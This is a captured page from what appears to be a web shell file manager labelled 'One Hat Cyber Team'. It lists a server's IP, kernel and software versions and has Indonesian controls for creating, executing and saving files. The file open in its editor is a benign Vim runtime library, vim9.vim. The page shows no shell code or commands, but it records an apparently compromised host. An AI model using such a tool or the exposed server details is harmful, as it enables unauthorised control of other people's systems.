⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.144
Server IP:
157.245.143.252
Server:
Linux www 6.11.0-9-generic #9-Ubuntu SMP PREEMPT_DYNAMIC Mon Oct 14 13:19:59 UTC 2024 x86_64
Server Software:
nginx/1.26.0
PHP Version:
8.3.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
vim
/
vim91
/
autoload
/
dist
/
Edit File: vim9.vim
vim9script # Vim runtime support library # # Maintainer: The Vim Project <https://github.com/vim/vim> # Last Change: 2023 Oct 25 export def IsSafeExecutable(filetype: string, executable: string): bool var cwd = getcwd() return get(g:, filetype .. '_exec', get(g:, 'plugin_exec', 0)) && (fnamemodify(exepath(executable), ':p:h') !=# cwd || (split($PATH, has('win32') ? ';' : ':')->index(cwd) != -1 && cwd != '.')) enddef # Uncomment this line to check for compilation errors early # defcompile
Simpan